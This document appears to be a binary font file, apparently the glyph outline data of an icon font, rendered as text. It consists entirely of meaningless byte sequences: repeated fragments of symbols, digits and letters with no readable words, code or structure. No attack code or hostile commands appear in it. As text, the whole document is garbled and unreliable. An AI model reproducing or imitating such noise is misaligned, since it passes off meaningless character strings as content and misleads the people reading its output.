-34G4<.**&'+d*"5))%AM11676767&'&'&'&'1&'1&767632&#2767#537#5#53533E88!!!!88EE88!!!!88EG0! !0#!!!Fu 7$##$#!!88EE88!!!!88EE88!!*+* !!!+ 6!!j##$##$F#&'&'567275#&'&'"#"'&547632676763276767 !------   --!  @      -'''7''7'&'&7676#015??n;'al(K\}* BN !.:%%( Ah>&1,'!e NF6 7 M"$J,#<%#&'6765&'&'767676/&'1&'63#&7&7!;:ON:;%%89<%(#/  nnp= "''1Z5556YC10 :?%=#e654'&#"327654'&'4713517&716714'1&'2&'&7676767227210167676''7&#"32767674'&'a   CA]+ &#     (  AC  `"&&23''!$ ?f\>##$74&& / %$  *)8 >\f? $!''32&&"W11676767&'&'&'11'"'&'&'&'&767676767676'&'"'&'&#&5676767632E88!!!!88EE88!!!!88Es    e  m$2!!88EE88!!!!88EE88!!"!""   E  /11676767&'&'&'#73E88!!!!88EE88!!!!88E0U!!88EE88!!!!88EE88!! 2<W%/&?6'6'&776'&7&'1&76'7&176'11&'&'&'6767674'1&'&'&67236'6'&1"1676'&'&&'&'&767&'&676016'&#"41017674'6762765016'#014'&'7676767677-    H  0 !!88EE88!!!!88EE88!!B   $                     ,tE88!!!!88EE88!!!!88E+             #$ b%11&#&567676567454'4'&'&'5237670#&'&'&'#"672767673#&'&'&'2'"';2767673WVVn  (@@DD6  W2-Y)d &<<>=)    ( '+ .AT_u!!6767&'&'10101#53#5#'#5327353236'71#'#5362'4516#6'4574516'036'45  `  L!!q  ++   6  v V    ` [WWUU<  +  *  T   iz%4'1&'&'&'&'&'&'&'&'"#41"1"#"##01223;2363676767676767676767674507015&5'"'1&#"#536         II 3         % ^ &?o!!6767&'&'1''&?6'&7676'&'&0'"'&76'&711'&'&23'&'&'&767676a(())2''&        %        % ''&  ((((%     ('%      '(%%   -1676767676'&'71'&'&7676>??>F/.W>?>?F/.WP+,==&',+=='&  11G*&'W  11G*&'W=&&*+==&&+*=5:FKP%11&'&'&'676767#&'1&'1&'676767%'7#'#7'7/'7'7""::GG::""""::GG::"" 32?>3223>>32W%W%n/213D EDP77G::""""::GG::""""::G>3223>>3223>%W%W^ddk uDE+77 #,5>GP|7'&7676'&6'&7&76'%6'&76'&776'&7&76/76'&1''#'&'&'&'&767&7676766&'1&'&767676'&'&#"1"1'&'&'&'01&'&'&776767676767676767636576'&c     V   z        u   '  P      !!"!)10-5((F                "   H         :    8   J    "$$# %##37 K     %%       \  I^t15&'1067454=6767672767#&'&'"632767675#&'&'7!!6767&'&'1#!"'&54763!2        @  @ (  ` x@ @ 5G\%'&57'6'&'&'"'6?''&'&?672'67167&'&'&'1&'1&7'7'#  ))(-''"/L+3D"!"!  :j A)( ))9:4'z&?+'!'&( V. = B $$"'(7C))'(-]%5'03670167676701010145&54?6767673176767676'&'&'&'&'&'&'&#"#"##0#&&'1&'"'&/&'&'""2176767676'B3 !!+2&' ] (( !",/%$  9"##$,-<;-.  B ! +1&&  "x  $%00%$  ++9;//  J  Nl!"3!27654'&#&1'0#&'&767676'&'&'&'&'&'&7676767676'1'1&#!"'&54762323236"'&'&'&767676501&76232361#1&'&7676"#1"'1&'6767676#;    >? ../ % u  *,+ (4  z    )   0   T  D31 G#23 #)71'&767676%1'&'36767674'()* '()* '_:KJ:% +*6&56>L=>$$70/76//79^)(21#"-%$>>M 1AQc16767&'&''5677!!6767&'&'673#&#""=76/&7&'1&'6767&&&&?;)aJ-U    6#$$$56$$$$6 &&&&8C"JU%   $#66$##$66#$BS"17676726767232323236'6'&'&'&745&7676767/01(  *),) -22)( 6%+*  /.d2 /& !!"  "&  ##  )=%%    1NN^fko%777'7??'7'&767672?6?77?7?''&76?6276777'7/???41676763?6'7?7''7''%67676'&76767?&'&#7'###"@ /  ]    ' A$$%%7 K :(~,   8 ( 9 & ' +"% (&9m  "?  qsvPSxx$&  uoV\F  G<!-&(Kzfh?B)    +.O,-+#'%'  *(?BR#     &'!9Tf763#&'6737'&76'&?673#'&'&'&76711676767&'&'&'1&'&'6767 W?4B O 5   $ZE88!!!!88EE88!!!!88E==\[>===\[>=G  s$ " >" ." ? !!88EE88!!!!88EE88!![>===\[>===\6N!!6767&'&''&?67#&'6737'&767633#'&'&'&7673  `   3A  V>b    4   `  "6r#   " &%!7 W'ASm721156#&#4766#7#'7&'6&?3367632''##54'1&&3276573167632''##54'1&&32765747632#017'3''&?456&373362#45016"#5*&&.'++N&  'Q  :&  'Q  5 ! L& $' L&7'# '   L'%0  _     F==     F=$   ) .   Dw@5>%654'&'&67676'&'&767673773'673'67''7:+,Rcml[O\8984sH2+ /!d=*D"e"#!-fI!#"fO=72$$ 3*ABP))." =+(63"%5 GnQ)5| #8%%5%7&'&#"3676637&'&#'671617&'&'67@@/--67,-GQR9 5!.="yCMNHH31)ABOOAA*66H+*8 G. /4  E>%$$$?4!!67676'&''/767/?6760989: s)4:E g  _4n @ =0dq  w6J 71#01'&'#'&5&76656'&0#&'0#&56767676671676'45&#&7"/&5&70103237476;67476;604#"'&501'01'#"'1&'&'563676743676'&'&'&'"'&'47672#&'&'&01'"11#'&'&766767&11"1&76761676'  & % ' V    2 $!!%  !!    !    )6EECXRQB~s   !$$      "   E     $$S       i'<S0!  ##  0E!"3!27654'&#1#"'&'##53367632'+'&=47632  @C @@C@. .   & #K %#  Yiy%11&'&'&'676767'6'1&'7'&'7'&'1'2330#"''"'&'777676'&'67'1&'137'1&'1&'73!!88EE88!!!!88EE88!!   %     #   # > E88!!!!88EE88!!!!88E# -+,-  3H -,-- #W< X6 (:Ef67161'&#"'&7716'&'&76'&76716'&7'5&'6711#"'&747&#77675&'"N1==>=2 BTTA cU)) ,+A].. ((P>  G @? $#--#$},/ >: ] JIV@==..!QQ`SFG OH H   A<G44G s $0<HT1#737#3676'6'&'#367654'&'3#367654'&'7#3676'6'&'#3676'4'&'#367654'&')GD ~DF' DF) DG' DF' DF) DF* KY (Y Y Y 6Y Y 6Y /h76316323"#"'&'&7&1223?6'01&'&##"#"#"'"'&'&'&'&5&545454747672723233'&'&'"'"'&74'&'&#"'"336367676565&5>'  0   ', $$PM$$   (22AA22 U     *   _ ,   $$QP$$ '  $$RV)(- $.4Le%&'&#&'&'&7&'&'&'"'"2327676765654'%6716323##"'&'&7'&'&'&76763016 (%  2C " 0011 /#  #    + M2  ?@  2) I;I &$% #"!!@    "',16;@EJOT35##53735##53735##5335##53735##53735##5335##53735##53735#xpp(xpp(xppHxpp(xpp(xppHxpp(xpp(xppxxppxxpp(xppxxppxxpp(xppxxppx*;%1'&'&7676&'1&'1&767676'76'1&'1&'767IVJ78 %%8SPP56##<>HA22%>>[J;;!! #17$%'%   LT  >3223>>3223>D----DD----D& %&7 +  Xp  23>>3223>>32--DD----DD--M3%1&'&54767'67167&'&'#67674767M#$$#T##$#$$#$$$$$$$$#$###h/jw71732767676'&'&'&'&"1#"'5#"31'&'&7&'&'&'&7676&'&'676676''&/#&'5673'&'5673#75673#&'#&'5673'(<(56'4#" 8!"%%+ / 16$% )* %%$   ((v    p    4!&+0,,, + ( "      $$ !!" "& (h(((    ]     2Ye7&'1&+36?3+3676'32?#"374+&54?#311#&54;6?#36?6'&'%#"276?6'1#32?332?6'&'&?6;2+32?6'&+36?% #     (%  N: # 09 L$ 0   b! 5 / C    `   )# 4 " c#b@ (!J   (  7!13/3?'9'?#'3##9so bc156p{t44P/2J&=.//)%1#&'&'6767267&'&#2767&'X,,C"//7E88!!!!88E7//"C,,O'&!!88EE88!!&'N*<\&76767676&'&'&''&76'&'&"201"01&'&7&'&"7676727#0#0#767476725010'012410767672323#00#057676076767650#0'&'1&'1&'010#"'&7676767&4747656'670101&7767676'7&'"'67676'&'&'"'#&'&'&'&'&#"#"'&'45&'&#"#&'01232&7677676767'6017676'&'%&'6&7&5&5&'&5&76741671&'&'&5&76767056'&'&#"#676'&2767633763'67'676'&'&67&'&'"'67&247676'&'&01"#67676'7&'S " 9       ( , %    $% %))          !   z               #  ] )  :#    $ {  . + )" !$1 $  &/         %!                        %9Kav3#5'&'4767651327654'&''3#5'&'4767651327654'&'%21#!"'&54763!5!!6767&'&'~44) @   33* A   D  84 h  4 h    #V^727676'4'&'&'3#"#727167#3'##&'&'&7&#'&'&75476;0363274'36'&  O& w+J!   [R T6 @  @&  % 7     + ! 8-335#'35%&'1&'&367676967676'5#31WJJ>>)*8VJJ..`//7 ''4S>?__"J===8)*?>S4'' 6//`..JJV__e@Rd&1&'"&&'&#027676'&'&767633272367456'&'1&547673&'1&'6767 :>CC>:8CP IKLH ODfz   UTSR1 !! 1211013676767&'&'&'"'7&56767>33>2222>Q$%66%$$%622="",,!!33=>23 K"6%$$%66%$#5+325&+32=#^r__` dQT~  <AFKP%#535#35#35'#353#35&'1&&/!327677676747'%#353#353#35'#35^BBBBNBBBBNBB $ #M 8nwTT) BBNBBNBBNBB;;==;;H<<<<01@ !239[?E )267162&'"5617165&'&"67&'#67&''1&'01323721&5676676632'"1''#"''&57"#&5473&''&7676767&5&'7676363676367&7676676222'%4'1&&767676'&'1&'&3276?&'1e"1&76767676'9      >h00    D0    ,_   5  =#  " 4       j h        _    $    *      :T    (#3&'6713&'&'79!67673WWdL@#$1!!J3&%` QkQtL %% @bU67*0.#)%7#5476735"'&#"#335Y (7! QQd]<O =F]#>176767676767&'&'/&'&?676?6lEF%  NIH//EEkI : OI  : OBCj6-.!  ;;XjCBt ,< t ,;  '###535353##3535##3535353535!@ZZ@&Z@*=M73#3#572'5&#535664'&#"3#572=&/73''7'73733r]M; &i%E   ! n *+ & &3"# 3c-  "  ("[-  -% &&! `7#3675&'3#36=&'7&'&'&'&'"'&'&#"00111011111001201010003211132010201010110000111011010101212322123032320321232303212230303232323012323232321212321230363230323212363032303216321230367670121474707014707412547250503474341056701016565070147416141654374705257074147056567470105416565434505434541470541474145650141705056501054145654501450505505250545454545&'5&'&&'&'&'54733547335473356235&'632632327632#"'&#"2363567335673356;2v*44),))12))- ((    4444}   ?Q'  )Q? L L GZ 1"C6716716'&'&'&7'&'1&67'&'&'&7667&'67674'0   0)   -6\====\[==`    1j  =<\\<==<\:0 H~&5676767&'&'&567&'6767675&'&'&'"#&'&'67676'&5&'&'476'&576767674'&'67&'676 @Ac Q43""9  3'&>  >&'3  9""34Q cA@ $%>?M M?>%$J  ,1hHH|h@@XE88  32?G77\  %  &&  &&  %  \76G@23  88FW@@h{HHg2,  06N@?''''?@N60/%0%##&'&'676727&'2767&'&/#35&'&#D &48&%%&86(>A[>2221?0+,$ ( jv4%##&&99&&'?A23>>32*qY)1*l1"'&'&767627!&'&'6767!5145145#"'01&'&'76747010301'&'401#76765,  #Pv' 3- !!%$$% -#gP/0Z($;+  "  'c>T73230127676'654/'&'&76767353501'&'&'&1727676'&'&#+ 3)(3 $FN-. ('<. ,8787 )""*# 6-3 1!"A,-Y$"6 =HH<+, .n !E.)) **,6 ! %3#!7! 'SQ6Q0QS %'% '7654'%'E<;AA<<ݡ< F "@A#  < @3i747167167167&'&'6'4'&'&'&'&'&57&'1&'1&'327676701270367674'q/        $  $%-$# '!    ""' ~)4`l~<Q`u#4;NUfv1921677476567'&'&17'&'&71101&'&767767650765&'167&'&50171'&'67#"327676'&5&5476767276767&'&'0101&#&'&547676'&'ǂ#&74767637'4'&'"&'&76701&&'&7&'&545#1&'&'&#0201""&'"1676767676'&#63"#"&'&'6767&'6763%&'672&'&##&'&54'&'2&'10'&'&'6?6727676'&'&'&'&7676301'01&'&'67632017016767672453&'110101"#&'&'&'&+"6767"'676'&'&71473"'&'&'1&'&7673767677#6'&5&'2767'1676501#"'#"367676'&'=       >                        %++&  +       ,       **      u    %.  o,v,Q L%       >      -      - f                       $+  +$        (                          + 2  E   ->7#"'&/327'67676#&'01&3676?6701"'&56767"'676?#'"5676767&'&547676760#'41"5'"7'&70567621276767676727670147676326767610161474767632676760##3670767657'&'71#1"'1&'67672?64'#"'41367"21!       &%        0000#"--#" !1 =9 F  9PO }        O^          .   1@<)0!!6767&'&'1010101#5'36767673  `  P%  #Q   ` 6eg8   7!!6767&'&'"#1"'1"#"#&547676507676'&5&'#1"'&#"##""#&7472767676=&'&'&76723322327630#3676'654545&'&'"1&7672223236327233t%   p        n    rk     =f    e>3&'1&'1&'1&#&7677676'67676'&'0012!"  />&'/$#$=&' 2 """)45;,,''*%%0 $%./()),-/0(GY%&#"327674'736767&'&'567&'&'&'&'&'65&'&'67&'1&'6767 '2  2!.7%%0  ' Z%9-!2  2%$82##>    = s\q16767&'&''&76723670125454#'&'&7676327674'4747636767612#367675&'&'&'1&'6767I0110IH1001HO    ( *,,,,yR7667RQ7667Qp01IH1001HI10   8(%  % B#/  ,,,,d67QR7667RQ76^%'&'&5&767676367016765&56#1'&'&76767276767654'454767636767612~ +  ,+++ !   N/B<)  "!N R/2  )((" {DG^y &4JQZ6NZh%&'1&'&'&'&'4767676'4'&'&'&'&!6767656"'"#"676767&'&45&767&'676'""'&76767674'&5676'67676&6'&'&'&'&&'&'&'&'67123&4'&567676&'6'47''61257674'1&76/&'1&732&'672#10141727167#71#&'&5&'&'05&76#4'#&'67677623476#7"1#67&'&'654'&67676716&&74763127&'&503'&'1&7'&771767676'&'&'&'&'&56'&'&7'&'1&'"&'&7&61&7676717'&''&'&'&'&'&3723 !01(   i" %    %$             h  .8      5   $S      `      , \     4:;*       ]         +))      }  ! :&     %    I  @     F               / 2X~&#"767676'&'1"'&'&'&'&767676323'&'1&767676'&&767601"'&'&'7&1'&301676767676'&##?6'&'z>D?88$$;;AA:9%$;4016 M( * $@%%*2SSN9 --11    .%9;AA:9%$;;AA:9%2    V "  MHL.$99?7  =!!1#&'&'7753&'7674'&/&'&'67676&#@"*c:"   (!  @! @(  #  &M!!6767&'&'1#&'&'7753&'7674'&/&'&'67676&#  `  "*c:"   (!     ` ! @(  #  ?[x?7'&'"'&5676%6#"'&7&'&'01674'7%&767''&56762%1"'&'&'67&547672'&'&767673'67&'&'@<.Q.( 1;B4   c-    @ . '-  i   ?2M.(1;B4)<## --<<##('8; J ';A  *   08E4    6F,&h 0,;,&18E4  -  ./EE..&&<  #G,*G,+GG<9G <G     W"#"#z8%&&%82$$ '+ u 0S3'&=535#&'&'76'535#56325&'%#"'5#76501'&'767675#N   &+'', M  &($Mo #ЮM$,#MM,Lcq qF ( ''7'7'@@޾ ?__?@%\\%$77$@:FR7671671636767673#01&'&''&'&'0#"'"'&?6514'#36514'#376716767416767&'&'0176'4'&'&'&'&567677v     nXX"  --DD--    $$66$$    B @%B+,,+B%4####4/Ej71#&'&'&'6767672'1&'7676'&''1#6676'&'&&'5&'##33675673675&'#r56TF88!!!!88FT65)?9h0((0((]BB!!88EE88!!BB]d*/C .1MME>@A+ +$)*',87/1(p((0((0 3#5;#53#5;#5%767567676756767675!@   t   '6C11676767&'&'&'476327&#"547632&'547632E88!!!!88EE88!!!!88EP0  x  x 0  !!88EE88!!!!88EE88!!    :  %%3&'&'357%57365&'&'&'3`l!78DD87!lhhK !!88EE88!! K@7  7ii0П&*E88!!!!88E*&&DXo%&'3767#"'&'5632'6312&#"&/327675654'5&'&&'2316367676545"'&'1122301&'&"#&'&01327014'*d,'01@@11',33+3@@2 -11- Y,, ;;JJ;: ,,*8887+33'%J  R))))R :.-F01\--.-Z01E..  )7 ) {  Cy"/&76767676?6=4/&7675473"'&/&=4?6#74'1&'&'&7&7672;2765&'"'&'&+"67 >  /2 5 0 +)   WR&, 9$ ;Z<%kjj  8  k k  k  A:   >@@  *%#53%!#5#5!#353353#35353#35335335  @`@ @@@ @@ `` ```` >B.U735#3=&'&1316761#&'&'#1367675#1767#'&'5#567635&'&'&3%275&'01&/67=&'&'&'&'56335#&'6?'&'675'632#"'#"'5632'#3135#h5O'&!"12!!"#   (%   )&  `  #" $%I/;? ''2!!!!2'% '$# -     qD    4  :  Z)^0I[m!361147676'476767&4'&'&'2'&'&'#"'&'&74767674'1&#"3276=4'1&#"3276=4'1&#"67654'1&#"3276=4'1&#"3276=4'1&#"67654'1&#"3276=4'1&#"3276=4'1&#"67654'1&#"3276=4'1&#"3276=4'1&#"67657&51&'&'67X  *#!%8! ,,00,, ! @``@       H      H      H       =SS= B^^B8   * ,>J: :J%!"/0"!%h   B   B     B   B     B   B     B   B   (   (1>HQh&'1&'1&'67676723=367#75356'7#'35##5##5##56'3=5'575'#353&'&7'676'E88!!!!88EΕ`F)o9  sD)*E EEEE$   8!!88EE88!!p ]? 6  480M<=Np0!!0 g E  8 D|%&'1&676703167"'&567674766'1'&'&54765'13!76?37676'&'#&'&'#54'&'#&#"#&  , 8&'  ! A V  " <<)H  ##  5("!<( 2211 U #%1&'&'67673#44NN4444NN44ZZN4444NN4554N5P&'676767676767&'&'1&'1&'67671&'&'&716767&'6rf ) 0':!!6767&'&'#5673#"#"#5673a)))) 8 8  ))))8  H 8 11676767&'&'&'#"#"#"#"#"'&'&'&767676767632370176763232327676767632323676#"#"#"76767632323232E88!!!!88EE88!!!!88E  DE          ; !!88EE88!!!!88EE88!!34   #" .. 1     (KUfw#&'&'567673'&#"#'#35676327#"'&'365654'&'&'&#"32767/#67632327654'&#"327654'&#"@6$%%$66$%%$6  $  t S " 3 P     %$66$%%$66$% Z"h  %"G   d   59%6716/&'&717676%6767674'&'&''" & ZAB4 $ ] 08GE88!!!!88E&% ' 6b944T@ .%)! " %P"!!88EE88!!I;>/d%1327654'&+1327654'132765&'&'&'&#"&'&7673276767654'"'65676'&'6767   n      )(327$$2))33))2$$732()-,3ABccBAABc      8$ 4BB4 $)..)  8,(8@****@@+*611676767&'&'&'#'&7673'#7632#"##"1E88!!!!88EE88!!!!88EZp KTUZ  e!!88EE88!!!!88EE88!!\cc ww "',16;@EJO'7'7'7''7'7''77'77'77'7'77'7/77'7'?'_7JNa."7A %  " <& )#.'UF7(T*3)=5P"3CBY,".',)$#$X##TJ " !- & %; / 1@ )*r@ D96_ l--_W OVB?PY577'&'&'6767'&'&'&'&'&'&'&/?67654'&'5'&'67D66DT%;&%'&;8  &,$,@**   >t`5 #(6 ,+>>,+ A  1 &*4,,B3'  711!67676'73&'&'&'X+AA98x3%&/ 0+11'(`FEPP623A&%3418N"#22@mST22%'67&'&'677%&'1&'6767//FG////G<-7$$$$76$$$$6+8H/00/HH/0%v$%77%%%%77%$V7&71676'&'?&'&'&'01'&'7767676'&'&'&'&56766@;CEVV?;C *@?@A0' )  (  8FUV?<BEVV?2) '  *(   !E%'&716/&0?6'7'&'&?176/&1/&?6?6':DT^- +29_\-,ARJ"}*'7\H$.K]1&'&54763231&'&/5676767&'1&#"#"'&'&'676?&'1&#"67674 1m!:aG 01   &!  !0 O!k'f0  1  !!  @ %"3'&'1&'1&'&'&'&567676'"#&'&76'"'&'&'&'&03207676567276'4'&'&'&'&'&5&'&7676767676767633632765672327&'&'&'&'&7676767676747676767676767676301667676545&'&'2 6          N          )                   :6767672237??7'7''''/'7'?'8P  C]8Y8}Rsf|1.+l &  ,ND% '$J .3E6 {l&Jc&Tz8a %   E`'Q`lt%1"'236767&'%671672&#&'167&'&'&'672354'&##&'&5017#"'5#675#35367&'#3753#35367&'#3753#;2=#+"=4+323;2=#+"=35#53354+373535#37353735#'#DEg&" gEE2.EEg "%gED-2<      y "'  9'  9 & ?'4;1! $$6-!#6$$!!2!-(     J7777VH++H+" >=    @L5!"3!27654'&#'1&'33675&'##6767 | :**^DD^&%66%&""9  | ""9D6""""69** '575'7/7XeWeUYVX@-uKK:5:O17/5 $(,048?CGKOVZ^gpz~67#'5#345#3&/#3&/#35#35#3#3#35#3#3367#735#35#535#535367!35#35#!67!736767#73014=#535#Ee  s  %  R  r=e111'&'&'&?6?676767674567036=4360"'1"27676'&'45&'"'"'076'&303'&'&'&'&'&'&'&767676'   1      > !!  1    ;   CV7#&'&74765''''''&'7&'7&'7&'7&'7&'7&545'767'67'67'67'67'67'637777777/&'1&'6767#1&'&'6767'654'&5'654'&5#654'&5&75##&'&'1#&'&'#&'&'21#&'&547&5&'#'&547&'&'3670132?5#727&'"'&'&' )+- "%    $" -+3378:; 8; 16 (."  ".( 61 ;8 <:883412KK2222KK21++AA++++AA++ )        >k    "  %$ '&&&&' #% "   ,' 84 A?GFHHFG?B 48 &+   K2222KK2222KA++++AA++++A    X p@       eB4W&7167327567'#"01&'454'&+7567;167676767676'&'"'&# cDdeDc   CC   3 %?    ?% !!vv" 1m{&'1&'""17676767767276767676'&'111"''4545450101&'&'&745&76767201'#1"'&'&5636'1&'&567#"'#1"'&'&#&54321'5&'&'&'&'&&767161272?6 *+U#$./#3; >**   $$5  0,('H&%  *&,/#"39&%    !    8e"..((4   8`=>.   !%&T/  65QQ!+ !%=! %$Bb 9        :!"3!27654'&##"'&'&'&#"'67676767676'&6 f @B.  %  C2  f /RV45 8a. N@`,X7&'1&7'&'&73067610176767301#!&'1&7101'&'&730676#767673#'1101#&'&/0'&'101#&76701747673i 8! $ $ !8 # 8! $ % !7 # 8! % % 8 $` p KK p  p KK p  p KK p Xm1716767&'&#1'&'&'&'05&'&'67670563230167676762!!6767&'&'"'7&567678%% 2$8&&''6N    b  `  )#T--CA/.-.CE%&8& 0 %%87&'        ` R%+C-,..BC-,0B5/7''7'/#''773?7'77'?"'1&'67632#''#/'7''7/5?'77'7?3/2767;?3?/        wH/7'6'' * $%7&66'5%$ *  $-&           -( #&4(66'2#&)'$4'4. '-$ "+kw11676767&'&'&'47&'&'"'7#6765&'"#"''676'4'"#"#6767&1"#'76'4'E88!!!!88EE88!!!!88Ek9""!CD#'    "0R  10;Y> PQD3!!88EE88!!!!88EE88!!1*55C » G_.9 ))J/! 0;>32!Df}%1'&'&'&547676763'&'1&'1&'&'&7676767&'1&'"767676767654'%2113276762&'&7r!;3*    27 "$$ , 1>=>!)   !  %%. !!! & 33>?<#")881!     7#7&'&5676;#5##&735W@`"+*?R7..#%""9P)( ?=. 533#o7R^4y3@*<C<JRny#4767"1&'&'3676736767676501&'&'676703&'35367654'&'#3#5673354'&#"367237&'6?#716?##'#'"'23u            d*I#))#&5 " f 5#$3!      %B&%Ma  &  J ss @%._n%#536757!&'&'6767!276509&'1&'476721&'&#"&'&'6763236765017&'1&+3532767&'"3672671357##'#'"#23?.0     @  <       3 Z& %  f$ %7?    `  v  K 6 /  DQQc"hcAN`7100&'&7676741672&'&#3325276767676'&'&'1&'&767677167676'&' !  &)$)#"!! #$! B     i$""5)++&'%%()#(44-,/.!(55.$%%/.,;fox#8<@"/&3676?2=4/&=4;2#/&'56?6#74'&'&5&76;2165&#3#"54+"32?&'67#&'67#&54+#536#01201'4#32'%4/&+"?6=4?63276=%/&=4?6756&1'"#"3?0=36=4/&?6/&=4?6?"32172=4#'0#54/&?6745'13#'3<::9 :::/ 7    >=$%P===%-===%>$M    ==>=KM !B!!B  BB B!!B!B  2      $$_,  ,_h$$G$ ^   $$G##  ,G##G##|3e7671676'&'&7676'&'&'&'&'&'&'45717676'&7676767676'&'&'&<NxN())Tj 2  QQ/9 / 86I.Z%471656#36'#3'4'&5&7675&'&7&'1&'4327&'""'36765&'&''5#&735#745654'5654'45&367''017&'1&'4327&'""'36765&'&/1327'#'305674'&'63#e**j$     K*)  $      "!_!9 0 "" 0        ;0  0 "" ";      E'' $ !B<Tk%?"&'&'4'&767616'&'"&'&5&767654'&'1105019&7676765016'&"654'0#&14#&'&'&54767676'&'&01727676'&'&#767674'05016767677676761"67670769676767101017676765&'45676765012767674'6767676'&'1'&767676767616307711#&'&767676'47012767670017&767.      :K44 $#3 *0 89E)'($              ')  ,S  o V  EW           #*)++ "      $         .!\  5  #'##373 eM80[5sr6YY ! 73'77#'##L&&& N1n0[[JbbBB$ X(  Ef7'##7#'3''373753#7#5#53##"'&'&'&5476767276323#4'&'&'&#"32767676757656574101&''33'373""01''67&'53274'5#35335#51#35335#5276?#35335#5727&'5767&/7#'#k4>>-'q>-->Q)d)          _YAA >? @@Y   P   &&   P   **c++g``ttt 3       a  ))               X++((r-=Rf|%"101#&54701454'&##456'&#'&5276765&'&001676'4'&676'&'&101"&56567656'&01'67674'"01'676'&#&1"""'&10127676'&&"#'&1376?7676760133767676701376767677676101765"76?37670107656716"101%4716716676701#1&'0547620127051476012#01                   +       T        %%!       #    #      :  |     U!"!6767&'&#11#&'&'&#"5632275#&'&'&#"&'56767632276767@0       @ `p 7#37#33#33#35B22e33e33d22}CLL S(  L[7&'7'%67165&#"35#35&'1&&3012767676'45456'&'1#"'&=66'&'1&&&'015&&35&'&'55476754'&'532767676'45456'&'%&'&761#"'&=66&98'-  ::J::    'k9-) *: "       "*`  s  xnn1     H)    *  'J 1 ^ 6    1?()  x 3731'#7Y>>Y,-DqottXX <D $Gai{675#"'535#'#356365&77425&#"#&'7767&'&'&'4'1&'3675#'&'365'671632''#?2767&'&#&/63235#+   ""Y&,  \,,S !  VX  ',   ,,/  "?& g ) H % D  *   (    "#"( !  A 3 *'{B  ! u0625&#&'&'32767&'&'&'&'&'/!&%"GGX44 !$*)%KQZ76"!!%! **L/   &'M4 !7471676767'01&'&'&'7&1676765&'&622 )(& ! {  ()7r (8877%%'&=32>>%.#..##*)+ q/fa76767676"+"#&'&'&'&'4'"5414'&+&0236745415767656'&'&#&#"#01&762'&'&5454545457"9""#76367600#01&'&76743323274=4'&'&'"#&#"#'&'&76762&'&'&323672767676767656='&'&'&'&#"#"#&#"#&376767656#"#"#"01&5 =B /0TO /5%&)'QA  "  /       #       $#"{ !  :  I* *  j     {65HI  YZd@3HK{74514=436'&'&576725454545454#&#&'&%!&'&'6767!#&#"#&37676767674#"#"#"04501&'&'&'&#"#"76743323254=4'&'&'"#&+0#0#76367621010#&'&'3232745015203767656'&'"'"+0#"41014'45&+&&'&'&'&'&'&32321213030367676701676'7&'&'&32376201367436767670145}  (                   BG((83 6D # ,' 2  $       `  &'?> T f  Y  c<  0    8 %''78]]z\\$!!6767&'&'373#5'#53#G`>oQB`XvGWttrr$).711676767&'&'&'7#5;#5#533#5""9:GH9:"""":9HG:9""++*G:9""""9:GG99""""99Gj++U++U++L75%!&'&'6767!4'1&'&'&'&'"#"#0123236767676765__   ` *!""!!""!66lz  `   !!###!@fYZY @ZY Yw 2e4+";25'&#"54#";2="1&7670132=4'&/&7676754#&#"01#&'&3270327676'%&1132=36767&'&'"'&56767'"1327654'&#))_$))"" : '  5!%)!//   " Q  {#n  -  "  )Y/.  h5EVs211&'&'&'6767635"113276767&'&'&#1'1"#723637232767676'&+73232#67676'&"##71'1"#723637232767676'&+@WDD(''(DDWWDD(''(DDWYHI*++*IHYYHI*++*IHYf y%  G!%  %%! y%  G!W"#((#""#((#"&&//&&&&//&&Gl,,& `jGl, -/D#&'&'&7676765&'&'&'27&'&'971176765&'&':>*) %$+I-- !77DE77!  !77E##N'!!!! *$%667%33H-4E77!  !77ED77!  """! !*@(5BO\iv#"&'&+";27676;27675&'&#+"=4;25#&=4;25#&=4;2+"=4735+"=4;25#&=4;2% %  ZK  KZ  $$  &&  ==z==|"=^q%67165101#"'&7676301&767'&'1&'1&7676'709"11127676'&'&'&767676'&6761'&'&7676&7676/117&''&767#1"'01767672'1'&7677&'$"! "%%>=3V -2  %s   4>    ./;;9:    #gRQ''%005 =?@-*066'' 3+,)76?   &)*! $   >   )  a     Y11&6'0167676212'&&'&74376767626766767676767013  G559 ,144X5 =56051717335 !&#   $ `   h,+  %$*/4F%##5#5476;2'432#"5711&'&'&'67676716767&'&';Mff#""##G88 #"88BD88"! 88HZ889:VQ<;99Wfxxf?##""{!!78FJ87! 88FC88""-;;RU:976]W99Bf11&'&'&'67676767676701'#5"'7374'"'&'&'&'7&1676353&654'&#F88! #"88BD88"! 88H :9V=''])"" -,`/0-_" " ;;U !78GJ87!!88EC88""$U:9) &&" +=+ ''!  9V:<FJl11676767&'&'&'&'1&'47#3#3367'#"'&'31'#31735#'6767&''6767621'I87 !!88EB88#" !78GV9: A ##,*  ['&;MG '<$Q $# W99""88CE88!!78JF88! =9:U# 2. 8  / ) %.99W<9>T11676767&'&'&'&'1&'47#3#3353517#5775#7#/#'6767'I87 !!88EB88#" 88GV9: :@@=AQ&&9X:7&?B+(BR+*DW99e""88CE88!!78JF88! =9:U 8' '88$$3t` V3$#99W -,1611&'&'&'67676716767&'&'#53#53G88 #"88BD88"! 88HZ889:VQ<;99W^!!78FJ87! 88FC88""-;;RU:976]W99++P**Ea11676767&'&'&'&'1&'1&732767'&'&517'6767&'&#'6767"101E88!!!!88EE88!!!!88EG23O$  K,4..:(GK,,5V98!!88EE88!!!!88EE88!!>''==B#1 ,! /d*1!*89V,8DPX11676767&'&'&'&'1&'6767#3767&'&#53036'#353676'4##53H88 !"88DB88"# 88GV:988ZW99;4 221!!78FJ87! 88FC88""-;;RU:976]W99)2((9./(,11,11&'&'&'67676716767&'&'6176714747276;##&/'41'&''05'&'"/5'0145''&/"#53767670167476327014767G88 #"88BD88"! 88HZ889:VQ<;99W   :3       4- !!78FJ87! 88FC88""-;;RU:976]W995l<   :@ a , ]  7H  ?_  W  Y9 Lb  E\Pb,11&'&'&'67676716767&'&''&#"'&"'&#"'&#"'&#"'&'&#32732?32?32?32?32??35##&=#&'6;54732G88 #"88BD88"! 88HZ889:VQ<;99Wk      +3      3;N!!78FJ87! 88FC88""-;;RU:976]W99 ] 3E  -^ TC P9 Z I +N FI QH :@ S,,AJO11&'&'&'67676716767&'&'#&'5#&'56733356735#7#35G88 #"88BD88"! 88HZ889:VQ<;99We  6  6) 7lll!!78FJ87! 88FC88""-;;RU:976]W99  6  6se (X,>JV11&'&'&'67676716767&'&'1676'6'&'2&5&767"'&?G88 #"88BD88"! 88HZ889:VQ<;99W<<<< 6) =!!78FJ87! 88FC88""-;;RU:976]W99<,,44,,,,44,,6d. 